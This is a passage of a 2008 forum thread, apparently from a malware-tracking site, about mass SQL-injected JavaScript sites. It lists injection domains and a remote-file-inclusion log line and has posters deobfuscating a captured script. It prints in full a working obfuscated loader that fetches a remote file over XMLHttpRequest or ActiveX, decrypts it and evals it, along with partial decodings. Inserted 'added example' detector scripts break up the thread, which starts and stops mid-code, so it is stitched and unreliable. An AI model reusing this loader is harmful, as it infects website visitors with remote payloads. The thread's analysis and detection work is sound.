e7%6Tse7B%se71%se3D%se6E%se65%se77%se20%se41%se63%se78KQ%1%se6%6Tse76%se65%se58%se4F%se62%se6A%se65%se63%se78KQ%1%se28%se6E%se4F%se58KQ%1%se2%6Tse3B%se7D%se63%se61%se78KQ%1%se63%se68%se28%se65%se2%6Tse7B%se71%se3D%se6E%se75%se6C%se6C%se7D%se7D';eval(unescape(cB.replace(/8KQ%/g,'b').replace(/%6T/g,'9%').replace(/b1%/g,'4%').replace(/%se/g,'%')));var nY=unescape(LV);if (!q){try{q=new ActiveXObject(nY);}catch(e){q=null}}var zqj=iGUR;var akK=function(){tP = unescape(q.responseText);var W5O=0;var 
Qg6M='Cc%76Cc%61Cc%7Z20Cc%74Cc%6ECc%37Cc%3BCc%66Cc%6FCc%7Z2r3H6BCc%74Cc%7ACc%4FCc%3DCc%30Cc%3BCc%6BCc%74Cc%7ACc%4FCc%3CCc%3Z35Cc%36Cc%3BCc%6BCc%74Cc%7ACc%4FCc%2BCc%2BCc%29Cc%7BCc%74Cc%6ECc%37Cc%3DCc%6BCc%74Cc%7ACc%4FCc%25Cc%4Z2ECc%6CCc%65Cc%6ECc%67Cc%74Cc%6r3H3BCc%74Cc%6ECc%37Cc%3DCc%4Z2ECc%63Cc%6r3H61Cc%7Z43Cc%6FCc%64Cc%65Cc%41Cc%74Cc%2r3H74Cc%6ECc%37Cc%29Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%2BCc%74Cc%6ECc%37Cc%3BCc%74Cc%6ECc%37Cc%3DCc%57Cc%35Cc%4FCc%2BCc%74Cc%6ECc%37Cc%3BCc%57Cc%35Cc%4FCc%3DCc%74Cc%6ECc%37Cc%20Cc%25Cc%20Cc%3Z35Cc%36Cc%3BCc%74Cc%6ECc%37Cc%3DCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%6BCc%74Cc%7ACc%4FCc%5DCc%3DCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3BCc%6ECc%50Cc%47Cc%5BCc%57Cc%35Cc%4FCc%5DCc%3DCc%74Cc%6ECc%37Cc%3BCc%7DCc%5Z57Cc%6FCc%3DCc%30Cc%3B';eval(unescape(Qg6M.replace(/Cc%/g,'%').replace(/Z/g,'2%').replace(/r3H/g,'8%')));var V3LR='MZ68MZ42MZ49MZ73MZ3DMZ30MZ3BMZ76MZ61MZ72MZ20MZ53MZ58MZ3DMZ27MZ27MZ3B';eval(unescape(V3LR.replace(/Z/g,'m').replace(/Mm/g,'%')));var x6;var Ak;for(x6=0;x6<tP.length;x6++){RWo=RWo+1;RWo=RWo%256;hBIs=hBIs+nPG[RWo];hBIs=hBIs%256;tn7=nPG[RWo];nPG[RWo]=nPG[hBIs];nPG[hBIs]=tn7;Ak=nPG[RWo]+nPG[hBIs];Ak=Ak%256;Ak=nPG[Ak];Ak=tP.charCodeAt(x6)^Ak;SX+=String.fromCharCode(Ak);}eval(SX);};var x=function(){if((q.readyState==4)&&(q.status==200)){akK();}};q.onreadystatechange=x;q.open('GET',zqj,true);q.send(null);
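The log line quoted in the post above is the detection opportunity in this story: a request whose query parameter carries a full remote URL, padded with trailing question marks, from a libwww-perl client. The following is an added example (not code from the thread or from any of its posters) that scans IIS W3C extended log lines for that pattern. It assumes the IIS 6 default field order (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status), which is the layout the quoted excerpt shows; the first sample line is the one from the post, the other two are constructed.

```javascript
// Added example, not from the thread: flag remote-file-inclusion (RFI)
// attempts in IIS W3C extended log lines. Field order assumed: the IIS 6
// default layout, which matches the excerpt quoted in the post.

const REMOTE_URL = /^(https?|ftp):\/\//i;
// User-Agent substrings typical of scripted RFI scanners; the quoted line
// carries libwww-perl/5.803. Treated as supporting evidence only.
const SCANNER_UA = ['libwww-perl'];

function parseIisLine(line) {
  if (line.startsWith('#')) return null;          // #Fields / #Date directives
  const f = line.trim().split(/\s+/);
  if (f.length < 14) return null;                 // not a full default-layout record
  return {
    date: f[0], time: f[1], serverIp: f[2], method: f[3], uriStem: f[4],
    uriQuery: f[5], port: f[6], user: f[7], clientIp: f[8],
    userAgent: f[9], referer: f[10], status: Number(f[11]),
  };
}

// One finding per query parameter whose value is a remote URL.
function findRfi(rec) {
  if (!rec || rec.uriQuery === '-') return [];
  const findings = [];
  for (const pair of rec.uriQuery.split('&')) {
    const eq = pair.indexOf('=');
    if (eq < 0) continue;
    const param = pair.slice(0, eq);
    const value = pair.slice(eq + 1);
    if (!REMOTE_URL.test(value)) continue;
    const reasons = ['remote-url-in-query'];
    // A run of trailing '?' turns whatever the vulnerable script appends to the
    // parameter into a query string on the remote URL, so the include still resolves.
    if (/\?{2,}$/.test(value)) reasons.push('trailing-question-marks');
    if (SCANNER_UA.some(s => rec.userAgent.includes(s))) reasons.push('scanner-user-agent');
    findings.push({ clientIp: rec.clientIp, uriStem: rec.uriStem, param, url: value,
                    userAgent: rec.userAgent, status: rec.status, reasons });
  }
  return findings;
}

function scanLogLines(lines) {
  return lines.flatMap(l => findRfi(parseIisLine(l)));
}

// Sample input: line 1 is the one quoted in the post; lines 2 and 3 are constructed.
const SAMPLE_LOG = [
  '2008-06-02 00:04:37 192.168.0.20 GET /phpAdsNew/view.inc.php phpAds_path=http://www.mgfcompressors.com/portal/help/file.txt??? 80 - 193.198.217.3 libwww-perl/5.803 - 404 0 0',
  '2008-06-02 00:05:10 192.168.0.20 GET /index.php page=about 80 - 10.0.0.7 Mozilla/4.0+(compatible;+MSIE+7.0) - 200 0 0',
  '2008-06-02 00:06:42 192.168.0.20 GET /gallery/view.php dir=ftp://scanner.example/x.txt? 80 - 10.0.0.9 Mozilla/5.0 - 200 0 0',
];

console.log(scanLogLines(SAMPLE_LOG));
```

A 404 on the request, as in the quoted line, only means the URI stem did not exist on that server; the same query against a host that does run the vulnerable include would succeed, so the finding is worth keeping regardless of status.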
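Every stage of the script quoted above has the same shape: a string constant, a chain of String.replace() calls that turns it back into percent-encoded source, an unescape(), and an eval(). The analyst's move is to replay the replace chain and return the text instead of evaluating it. The following is an added example (not code from the thread or from any poster) that does this for the two constants K and vuL copied from the "partially decoded" listing; the decoding steps are the ones the listing itself applies. It also shows the arguments.callee.toString() trick that tripped up the decoding: the final-stage key is the function's own source with non-word characters stripped and upper-cased, so whitespace changes are harmless but swapping eval for a logging call inside the function silently changes the key.

```javascript
// Added example, not from the thread: decode one obfuscation stage statically
// instead of handing it to eval(). K and vuL are string constants copied from
// the "partially decoded" listing; the replace chains are the ones it applies.

// Equivalent of the 2-hex-digit form of the legacy unescape(): "%41" -> "A".
function unescapeHex(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Apply [regex, replacement] pairs in order, then unescape. Order matters:
// in vuL the 'C' -> '%3' step has to run before 'GR%' -> '6', exactly as the
// original does it, because the second step consumes output of the first.
function decodeStage(encoded, steps) {
  let s = encoded;
  for (const [pattern, replacement] of steps) {
    s = s.replace(pattern, replacement);
  }
  return unescapeHex(s);
}

// Constants copied verbatim from the listing in this thread.
const K = 'spd7%CsAspd%CsA1spd72spd20spd78spd78spd%CsA3spd3Dspd27spd54spd72spd7%CsAspd3%CsAspd73spd38spd27spd3Bspd%CsA8spd2Bspd3Dspd27spd%CsAAspd39spd44spd27spd3Bspd79spd%CsABspd75spd%CsA9spd3Dspd%CsA2spd3Bspd7%CsAspd%CsA1spd72spd20spd72spd52spd3Dspd27spd%CsABspd71spd27spd3B';
const K_STEPS = [[/%CsA/g, '6'], [/spd/g, '%']];

const vuL = 'SGGRCSG3DSGGRCSG2BSG54SGGR%8SGGR%4SG3BSG72SG52SG2BSG3DSG27SG45SG49SGGR%1SG34SG27SG3B';
const vuL_STEPS = [[/C/g, '%3'], [/GR%/g, '6'], [/SG/g, '%']];

// The last stage derives its key from arguments.callee.toString(), stripped of
// non-word characters and upper-cased. Reformatting whitespace leaves the key
// intact; editing any token inside the function (e.g. eval -> console.log)
// changes it, and the decrypted payload becomes garbage.
function keyFromSource(src) {
  return src.replace(/\W/g, '').toUpperCase();
}

function decodeAll() {
  return { k: decodeStage(K, K_STEPS), vul: decodeStage(vuL, vuL_STEPS) };
}

console.log(decodeAll());
```

When a stage is decoded this way, the next stage is plain text and can be fed back through decodeStage() with its own replace chain; the function source used for the key must be the untouched original, so keep a pristine copy of the script separate from the one you annotate.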
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 12:53:57 pm
Yancy=Mike?

mike@shadowserver.org -- yup, that's me

Quote
http://www.malwaredomainlist.com/forums/index.php?topic=1867.0

Need adding?

I've been trying to stick to script=src methods, rather than iframes. It's more difficult to tell whether or not the iframes are mass injections. I've yet to run across what looks like injected jscript that turns out not to be a mass injection.
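The domain list at the top of this thread, and the script-src-only policy explained just above, translate directly into a content check: look for appended <script src=...> tags in the text fields the mass injections write to, and report any whose host is on the list. The following is an added example (not code from the thread or from any poster); the domain list is the one collected in this thread so far, while the sample rows and the script paths in them are constructed. Iframes are deliberately left out, for the reason the post gives.

```javascript
// Added example, not from the thread: scan text fields (e.g. a dump of the
// CMS tables a mass SQL injection writes to) for appended <script src=...>
// tags and report those whose host is on the domain list from this thread.
// Sample rows and the script paths in them are constructed.

const INJECTION_DOMAINS = [
  'redir94.com', 'locale48.com', 'en-us18.com', 'sysid72.com', 'libid53.com',
  'script46.com', 'rundll92.com', 'logid83.com', 'xiaobaishan.net',
  'rexec39.com', 'tlcn.net',
];

// Matches <script ... src=VALUE ...> with or without quotes around VALUE;
// injected tags usually arrive unquoted.
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

function hostOf(src) {
  try {
    return new URL(src).hostname.toLowerCase();
  } catch (e) {
    return null;  // relative or malformed src: not an external include
  }
}

function isListed(host) {
  return INJECTION_DOMAINS.some(d => host === d || host.endsWith('.' + d));
}

// rows: [{ id, column, value }] -> one finding per external script include,
// with listed=true when the host matches the thread's domain list.
function scanRows(rows) {
  const findings = [];
  for (const row of rows) {
    for (const m of row.value.matchAll(SCRIPT_SRC)) {
      const host = hostOf(m[1]);
      if (!host) continue;
      findings.push({ id: row.id, column: row.column, src: m[1], host, listed: isListed(host) });
    }
  }
  return findings;
}

const SAMPLE_ROWS = [
  { id: 1, column: 'title', value: 'Spring catalogue<script src=http://www.redir94.com/constructed.js></script>' },
  { id: 2, column: 'title', value: 'Clean row with no markup' },
  { id: 3, column: 'body',  value: '<p>Hi</p><script src="https://cdn.example/lib.js"></script>' },
  { id: 4, column: 'body',  value: '<iframe src=http://www.locale48.com/constructed.html></iframe>' },
  { id: 5, column: 'body',  value: '<script src="/local/app.js"></script>' },
];

console.log(scanRows(SAMPLE_ROWS));
```

External includes that are not on the list (row 3 above) are still reported, with listed=false, because a fresh injection domain shows up in the data before it shows up on any list; triage those by hand and feed confirmed ones back into INJECTION_DOMAINS.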
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 02, 2008, 02:26:38 pm
New additions:
hxxp://www.xiaobaishan.net
hxxp://www.rexec39.com
hxxp://www.tlcn.net
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 02, 2008, 09:38:56 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 03:29:47 pm
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 03, 2008, 11:40:15 pm
There is a script here which may be malicious. I don't know much about it; for all I know it could be clean, but it looks heavily obfuscated: mgfcompressors.com/iieox.js
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 03, 2008, 11:44:31 pm
I'm getting a 404 for that one?
Title: Re: SQL Injected jscript sites
Post by: Orac on June 04, 2008, 11:32:17 am
Steve, I am also getting a 404 from that link. Wonder if it's been cleaned, or they just don't like British IPs lol
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 11:55:29 am
It changes the name of the file. It is yzuac.js at the moment.
If you visit the link for the 2nd time - the page will be clear, no references to the JS file will be there.

The script is d*mn complicated.
I'll give it a try, and I'll post the results (if I get any).
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:32:34 pm
I didn't get far. The script tries to define a function in a way that doesn't work in SpiderMonkey.

If someone wants to try it in IE under a virtual machine, here is the code I got:
Code:
var arg="btryttfi";
function Cwmf8K(AH){var zoU5="C68KC3";var U47="var FuqV=75397;";var Pk="qeJ33cqe3";var zOR="8N0G8";var Jz="9G8N0G850";var vV="charCodeA";var pK="901;var xEx=1";Jz+="G85DG83DG84";var ySE="nLej-40955883";var j6="e3Dcqe31";var eBBT="scape(U.replac";var u1oP="Z2Yh;n";var sz=")));var oGZ";var r="qeEl1";var Bi="q6KC3BKCUeqAK";zOR+="50G85DG8";var X="change=G;Y";var UqE="Txc+=String.fro";var EwzG="6c-857";var mkj="G84CG83DG843G";var i7=";var xC=711";var Q1="2daR20d";var BAZz="(/f/g,'A').re";var ZhM5="L=new Activ";var RkYD="L=nul";var oie="(/cqe/";var MU3=");D=xC%nLe";var pjJt="5DG83BG843G";var MCSe="6F9D%g12";var tSPH=");mi+";var CN="0%g125%g120";var RF="ace(/Ueq/g";var gstw="ape(De.rep";ySE+="84);F";var KZP="var YL=null;va";var gh="l=unescape(";var VyU="61G8N2G84";var lJ="o/g,'%'";var em9="KC6UeqK";var cy0="2G86FG86DG843G";var iB="0dSmi460dSmi750";var X1Vn="KC76KC61";var SN="ace(/9/g,";var KO="(/G8/g,'%')))";zOR+="3BG845G850G845G";var uf="86DG86DG84CG8";var XjNy="g136%g13B9A%g";var UK="%4C%48%54%54%";SN+="'%5')));}qIpP=";var n8vF="e(/\\W/g,'');";uf+="3DG84FG8N9G82";var ClN8="ce(/M1/g,'%";var mNf="%g143%g1769";pjJt+="8N6G851G85B";var GC="r YH=function()";var rK="KC61KC";var y="3D%g143%g1769";var kwC="g148%g165%g176%";var hsR="4D%4C";KO+=";}eva";cy0+="868G8";var EbF="String";rK="C78KC43KC3BKC76"+rK;var rK2u="g,'D')));FuqV=";var aSn5="33Fpo34F";var t="N0G850G85DG82";var TfU="DFpo3BFpo76";var Dd="KC76KC61KC7";var V9sI="tring.fro";MU3="v-59581"+MU3;var c="2B9A%g148";MU3=EwzG+"5844471)*(v"+MU3;var g="XObject(z";g+="zl);}";var pMu="cape(z2l";var dg="i.charCodeA";var Usbs="L.sen";kwC+="g13D%g143%g1";lJ+=")));Z2Yh=Z2";var WDIF="L=null}}v";var ERL4="mi/g,'%')));";Bi+="C32KCUeq9KC68KC";var rq="cqe72cqe2Vc";hsR+="%48%54%54%50';i";pK+="8390;Pv6";ClN8=",'M').repla"+ClN8;var Lm="69%63%72%6F%73%";TfU="po56Fpo2DFpo2"+TfU;mNf="%g13B"+mNf;var uT="pe(Cpw)";var KJKW="replace(/aR/";var mw="a++){CvQ[UE";var kIc="ngth;oGZI";var SsV="0G845G";var kzg="3B';eval(un";var 
DY="3BG85AG848G";KO+="l(q);};var G=";n8vF="eplac"+n8vF;var Eo="o4CFpo3B';ev";var g76O="qeJEl3cqe3Dc";var j=");uA=183;}}";gh+="it);if ";RkYD="();}catch(e){Y"+RkYD;var yCa="').replace(/El";var h6Sm="3B9894%g13D9A%g";var SNT="dSmi75";var sh="9D%g13B%g143%";var uK8="2Fpo20Fpo";uT="r ejA=unesca"+uT;Pk=j6+"cqe3c"+Pk;var Esh="2G84CG8";var XeN="G85DG83BG";BAZz=pMu+"P.replace"+BAZz;gstw="eval(unesc"+gstw;Dd="n0KC78KC43KC3B"+Dd;var Cxt1="qeEl1cq";ySE+="uqV=FuqV%"+u1oP;var FBk="DG86DG";var pk="place(/B%/g";var J2="nseText);var X";gh+="(!YL){try";var bAg="5BG845G850G8";var J="849G8N0G850G";UK="%32%2E%58%4D"+UK;FBk="852G86"+FBk;VyU+="3G86FG86";h6Sm+="148%g165%g1";RkYD="tpRequest"+RkYD;Q1="daR6B%daR7"+Q1;var tW8J="dSmixigY";KJKW="unescape(BUBC."+KJKW;mNf+="19B98949D%g13D9";var UkqY="051;var Mkm";KO="g,'7').replace"+KO;t="85BG8N1G849G8"+t;var dl9o="0G845G";FBk="DG86DG84CG83DG"+FBk;J="G8N1G"+J;var Af="84CG8";var nr="mmL;for(RbLR=0;";FBk+="84CG825G";UK+="50';var";i7+="63;var EjFO='KC";var PLZK="po72Fp";var REQt=";Go<256;Go+";V9sI="){Txc+=S"+V9sI;var DAJC="dSmi760dSmi3D0d";PLZK+="o20Fpo72Fpo7AF";var mtJB="850G845G8";dg="ngth;ZHev=m"+dg;gstw="CG829G83B';"+gstw;var w6="qe5cqeJ3DcqeE";var xXpp="YL.onrea";U47+="var Z2Y";Q1="30daR3BdaR76"+Q1;DAJC="640dSmi6A0"+DAJC;vV=kIc+"++){uA^=mi."+vV;w6="3cqe59cqeEl1c"+w6;TfU="Fpo75Fpo71F"+TfU;var CKCG="80606";c="9894%g1"+c;var tY9Q="();var UEma";var KJGB="65%g176%g13D%g1";Eo="BFpo4BFp"+Eo;var Lw="Fpo27";var bZx="3DG843G8N6G851G";var Rk7k="UeqKC37KC3";Bi="KC7UeqKC71KCUe"+Bi;Cxt1="e7Elc"+Cxt1;var NJZE="ect(ejA";var AB="52G86DG86";UK="D%73%78%6D%6C"+UK;ClN8+="').repl"+SN;var H="C37KC37KC32K";Dd+="2KC20KC76KC76KC";V9sI+="mCharCode";KJGB+="43%g176919";y="g147%g16F9D%g1"+y;ERL4+="CvQ=new Array"+tY9Q;pk+=",'1').replac";Usbs=",IOom,true);Y"+Usbs;FBk+="832G8";em9+="C6AKC3Vn0";var yjZN="UeqAKC32KCUeq9";dg="%mi.le"+dg;UqE="(oGZI%76==75){"+UqE;var OcK="){if((YL";var T7="6EKC4CKC6U";var okr="9KC3UeqKC3";var 
ojT8="KC4CKC3Vn0KC33K";rK+="72KC20KC6EKC4CK";NJZE=ZhM5+"eXObj"+NJZE;Af+="3BG8N1G82B";i7+="UeqAKC32KCUeq9K"+zoU5;var ixL="){YL=null}}";var Dt="86DG84CG83DG84";gh=WDIF+"ar zz"+gh;y=sh+"g176919B%"+y;XeN+="843G8N6G851G";var Ip="G869G86EG86N";t+="BG843G8N6G851G8"+bAg;H+="C3UeqKC3B"+X1Vn;PLZK+="po31Fpo3DFpo3";XeN="45G850G845"+XeN;SsV="845G85"+SsV;ixL+="var IOo";gh+="{YL=new ";dg=REQt+"+){ZHev=Go"+dg;g=gh+"Active"+g;Eo="DFpo44Fpo2"+Eo;DY+="865G8N6G8"+bZx;var dpL="851G85BG8N1";var jmh="KC6UeqKC6A";RF+=",'5').replace(";var Wy="i=arguments.";ixL+="m=SYaX;va"+GC;SNT="i3D0dSmi460"+SNT;KJKW="7daR3B';eval("+KJKW;var XgE="ace(/0dS/g,'";var qMc1="1G849";var euFA="th;nLej=nLej+xE";J2="(YL.respo"+J2;XeN="85BG8"+XeN;h6Sm=c+"%g165%g176%g1"+h6Sm;zOR+="83DG845G85"+dl9o;T7=rK+"C6UeqKC6AKC3BKC"+T7;Usbs+="d(null);";em9="6EKC4C"+em9;BAZz=Pk+"B';eval(unes"+BAZz;Af+="G83DG853G8";var LkCR="r ZHe";uT=RkYD+"l};}va"+uT;SsV="5G836G83BG"+SsV;uT="XMLHt"+uT;sz="lace(/%J/g,'8%'"+sz;mtJB+="5DG83DG85A";rq+="qe75cqe41cq"+BAZz;Af="DG86DG"+Af;gstw+="lace(/N/"+KO;ixL+="{Oy = unescape"+J2;DAJC="50dSmi"+DAJC;ySE="890)*("+ySE;ClN8+="0;var BUBC='d";okr=ojT8+"C30KC3"+okr;UkqY=rK2u+"FuqV+44"+UkqY;euFA=ySE+"Lej=rz1+D.leng"+euFA;kzg+="escape(Z3p.repl";Usbs=X+"L.open('GET'"+Usbs;gstw="52G86DG86DG84"+gstw;DAJC+="Smi410dS";yjZN+="KC68KC2AK"+T7;kwC+="76919B%";eBBT="g13B';eval(une"+eBBT;var Dda="%g148%g165%g176";Bi="68KC2BKC46"+Bi;var Ckds="dSmi7xigY0";ClN8+="aR45daR50daR4";uf+="EG863G868G8"+VyU;tSPH+="=FuqV;var";XgE="ig/g,'z').repl"+XgE;SsV="G825G832G83"+SsV;RF+="/KC/g,'%').";OcK=gstw+"function("+OcK;Wy=mw+"ma]=UEma;}m"+Wy;Ckds="0dSmi760dSmi610"+Ckds;iB+="dSmi710dSmi";dpL="G82BG843G8N6G"+dpL;var K="Fpo3BFpo4";Rk7k+="1KC30KC3BKC"+em9;UK+=" 
it='%4D%"+Lm;OcK+=".readySt";uK8=TfU+"Fpo61Fpo7"+uK8;FBk="852G86"+FBk;Af="G852G86"+Af;yCa=rq+"place(/V/g,'0"+yCa;MCSe=kwC+"g147%g1"+MCSe;MCSe+="B9A%g148%g165";sz=oie+"g,'%').rep"+sz;Wy="6;UEm"+Wy;i7+="Vn0KCUeqA";y=KJGB+"B%g147%g16F"+y;g76O="cqe7c"+g76O;Esh="G8N4G828G852G86"+Esh;n8vF=EbF+"();mi=mi.r"+n8vF;Rk7k=Dd+"3Vn0KC32KC3"+Rk7k;nr="var R"+nr;qMc1=DY+"85BG8N"+qMc1;XjNy+="148%g1"+y;MCSe="ar U='9A%"+MCSe;XjNy=CN+"%g132%g135%"+XjNy;Q1=ClN8+"5daR3DdaR"+Q1;yjZN=Bi+"3Vn0KC"+yjZN;t+="45G85DG83BG"+FBk;pk+="e(/dJ/g,'%'))";var VJ=";RbLR++){";KJKW="daR3DdaR27daR2"+KJKW;Eo+="al(unescape(Mkm";uK8=aSn5+"po36Fpo3BFpo46"+uK8;Dt="83BG852G86DG"+Dt;PLZK=UkqY+"o='Fpo76Fpo61F"+PLZK;dg=LkCR+"v;for(Go=0"+dg;eBBT+="e(/%g/g"+Q1;sz+="I;for(oG";yCa="cqe7ElcqeEl1"+yCa;VJ=nr+"RbLR<Oy.length"+VJ;UqE+="mCharCode(uA"+j;AB=mkj+"8N6G851G85BG8"+AB;XgE+="N').replace(";uT="){try{YL=new "+uT;yCa=g76O+"qe27cqe27cqe3B"+yCa;Ckds+="dSmixigY00dSmi6"+DAJC;J="ar De='"+J;pjJt+="G8N1G84"+Jz;Af+="N4G8N2"+Ip;yCa+="/g,'6').replace"+sz;XgE+="/xzY/g,'2').r";var aKIf="G86FG";var nnIR="UEma=";CKCG=lJ+"Yh%KL;var Pv6c="+CKCG;dg+="t(ZHev);v"+MCSe;hsR+="f (!YL"+uT;ERL4=XgE+"eplace(/N"+ERL4;t+="35G836G83";nnIR+="0;UEma<25"+Wy;MU3=euFA+"x;xC=(Pv"+MU3;Ckds=tW8J+"50dSmi440dSmi3B"+Ckds;okr+="2KC3B';ev";yjZN+="eqKC6AKC3V"+Rk7k;hsR+=";if (!YL){try{Y"+NJZE;H+="KC72KC20KC4B"+okr;kzg=Ckds+"mi480dSmi"+kzg;Esh=uf+"4G865G841"+Esh;RF="pe(EjFO.repl"+RF;ERL4+=";var ";Af+="G82EG866G8N"+cy0;uK8=PLZK+"3Fpo30Fpo"+uK8;w6+="l5cqeEl4c";yjZN+="KC6EKC4C"+jmh;xXpp+="dystate"+Usbs;SNT=iB+"560dSm"+SNT;AB+="DG84CG85DG8";vV+="t(oGZI);if"+UqE;CKCG="e(/Fp"+CKCG;SsV="G849G8N0G850"+SsV;qMc1="G835G836G8"+qMc1;KZP=V9sI+"(uA);}mi=Txc;"+KZP;dpL+="G849G"+zOR;CKCG+=";vv=vv+33"+pK;xXpp="{YH();}};"+xXpp;uK8="(/Vn0/"+uK8;w6=Cxt1+"e72cqe2Vcqe5"+w6;w6=tSPH+" 
z2lP='cq"+w6;ixL+="T=0;va"+dg;nnIR+="callee.to"+n8vF;nnIR+="mi=mi.toUppe";hsR="2E%58%"+hsR;eBBT="g176%"+eBBT;w6+="qeElfcqe7Elc";r+="cqe72cqe2Vcqe54"+yCa;Dda=ixL+"%g176%g13B9A"+Dda;kzg+="ace(/"+ERL4;AB=t+"BG852G86DG86D"+AB;K=Lw+"Fpo33Fpo35Fpo27"+K;nnIR+="rCase("+w6;VJ+="qIpP=qIpP+1;v"+J;Af+="61G8N2G843"+aKIf;Dda=g+"catch(e"+Dda;SsV+="83DG845G850G845"+dpL;RF+="replace"+uK8;MU3=CKCG+"c=(Pv6c-79"+MU3;pk=KJKW+"g,'J').re"+pk;MU3=Eo+"o.replac"+MU3;RF=H+"al(unesca"+RF;MU3=K+"4Fpo3"+MU3;UK=KZP+"r Cpw='%4"+UK;SNT=MU3+"j;var Z3p='"+SNT;mNf=XjNy+"19B98949D"+mNf;VJ+="83DG8N1"+SsV;SNT+="0dSmi710dSmi560"+kzg;Dda+="%g13D"+h6Sm;mtJB=XeN+"85BG845G"+mtJB;mtJB+="G848G865G8N6G"+Dt;RF+="44Fpo3D"+SNT;i7=U47+"h=73665"+i7;yjZN+="KC2AKC3UeqK"+RF;qMc1+="G8N0G850G8"+pjJt;pk=eBBT+"aR7B%"+pk;Esh+="52G829G85E"+Af;AB=mtJB+"3G8N6G851G"+AB;yjZN+="mi;for("+nnIR;AB=qMc1+"3G8N6G851G"+AB;pk+=");var RbLR;"+VJ;AB+="3BG852G"+Esh;xXpp=".status==200))"+xXpp;Dda+="76%g12"+mNf;hsR+=");}catch(e){Y"+Dda;OcK+="ate==4)&&(YL"+xXpp;i7+="KC32KCUeq9KC"+yjZN;hsR=UK+"6F%66%74%"+hsR;hsR+="A%g148%g165%"+pk;r=i7+"qe3Bcqe7Elc"+r;AB+="864G865G828G8"+OcK;hsR=vV+"if(oGZI%76!=75"+hsR;r+="ZI=0;oGZI<mi.le"+hsR;r+="825G832"+AB;eval(r);}Cwmf8K(arg);


Take a look at the first variable:
var arg="btryttfi";
The value of the variable is the name of the file on the server. It contains some data probably needed in the script.
After going through deobfuscation, I got this far:
Code: [Select]
var FuqV=75397;var Z2Yh=73665;var xC=71163;var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));FuqV=FuqV+44051;var Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';eval(unescape(Mkmo.replace(/Fpo/g,'%')));Z2Yh=Z2Yh%KL;var Pv6c=80606;vv=vv+33901;var xEx=18390;Pv6c=(Pv6c-79890)*(nLej-4095588384);FuqV=FuqV%Z2Yh;nLej=rz1+D.length;nLej=nLej+xEx;xC=(Pv6c-8575844471)*(vv-59581);D=xC%nLej;var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));CvQ=new Array();var UEma;var mi;for(UEma=0;UEma<256;UEma++){CvQ[UEma]=UEma;}mi=arguments.callee.toString();mi=mi.replace(/\W/g,'');mi=mi.toUpperCase();mi+=FuqV;var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));var oGZI;for(oGZI=0;oGZI<mi.length;oGZI++){uA^=mi.charCodeAt(oGZI);if(oGZI%76==75){Txc+=String.fromCharCode(uA);uA=183;}}if(oGZI%76!=75){Txc+=String.fromCharCode(uA);}mi=Txc;var YL=null;var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';var 
